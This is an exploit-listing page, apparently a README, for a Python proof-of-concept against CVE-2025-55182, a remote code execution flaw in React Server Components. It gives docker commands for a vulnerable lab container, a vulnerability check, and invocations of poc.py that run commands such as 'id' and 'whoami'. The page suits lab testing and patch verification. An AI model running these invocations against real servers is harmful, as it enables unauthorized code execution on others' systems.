Share
## https://sploitus.com/exploit?id=051481F2-4F1B-51F7-8E20-435DA5384F03
# CVE-2025-55182 - React Server Components RCE Exploit

Python CLI exploit for CVE-2025-55182, a critical RCE vulnerability in React Server Components via `react-server-dom-webpack`.

**Based on:** [ejpir/CVE-2025-55182-poc](https://github.com/ejpir/CVE-2025-55182-poc)

## Build and run vulnerable container
```bash
docker build -t cve-2025-55182:lab .
docker run -d -p 3002:3002 --name cve-2025-55182-vuln cve-2025-55182:lab
```

## Check for vulnerability
```bash
python3 poc.py --ip localhost --port 3002 --post-endpoint "/formaction" --check
```

## Remote Code Execution

```bash
python3 poc.py --ip localhost --port 3002 --post-endpoint "/formaction" --cmd "id"
python3 poc.py --ip localhost --port 3002 --post-endpoint "/formaction" --cmd "whoami" --no-ssl-verify